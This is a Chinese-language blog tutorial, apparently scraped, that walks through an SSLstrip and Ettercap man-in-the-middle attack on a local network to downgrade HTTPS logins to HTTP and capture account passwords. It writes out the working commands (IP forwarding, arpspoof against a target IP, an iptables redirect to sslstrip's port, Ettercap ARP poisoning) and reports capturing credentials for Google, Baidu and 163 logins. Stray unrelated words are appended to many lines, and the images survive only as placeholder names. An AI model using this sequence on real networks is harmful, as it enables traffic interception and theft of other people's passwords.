SSLstrip 中間人欺騙Https轉Http獲取密碼

***回顧app

SSLstrip + EtterCap 中間人***實現https轉換成http 以獲取賬號密碼。tcp

Linux環境下 咱們使用iptables過濾一下數據包,而後用sslstrip監聽端口,獲取數據。ide

數據包轉發 echo 1 > /pro/sys/net/ipv4/ip_forward測試

而後開啓Ettercap的iptables 功能google

clip_p_w_picpath001

clip_p_w_picpath003

把注析去掉3d

來個arp欺騙不使用sslstrip 來測試一下httpsblog

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2ip

clip_p_w_picpath005

Okssl

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000路由

NAT 必定的基礎

-T 匹配的表 NAT表 :PREROUTING 修改來的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改準備發出的包

-A 表示加入高級選項

-P 協議類型

-J 表示把目標80端口的數據包轉到其餘端口 上訴命令是10000端口

開啓ETTERCAP

Ettercap –T –q –I eth0

clip_p_w_picpath007

clip_p_w_picpath009

登陸http的百度 效果良好

監聽到數據了

clip_p_w_picpath011

clip_p_w_picpath013

登陸google

發如今https 卡頓 沒法經過

clip_p_w_picpath014

開啓sslstrip

clip_p_w_picpath016

clip_p_w_picpath018

再向google登陸的時候 https變成http

clip_p_w_picpath020

成功登陸

clip_p_w_picpath022

監聽到賬號密碼

clip_p_w_picpath024

百度的

clip_p_w_picpath026

clip_p_w_picpath028

163的登陸

clip_p_w_picpath030

http的跳轉

clip_p_w_picpath032

網速過慢……

除了使用arpspoof 還能夠使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺騙 原理同樣的。

相關文章
相關標籤/搜索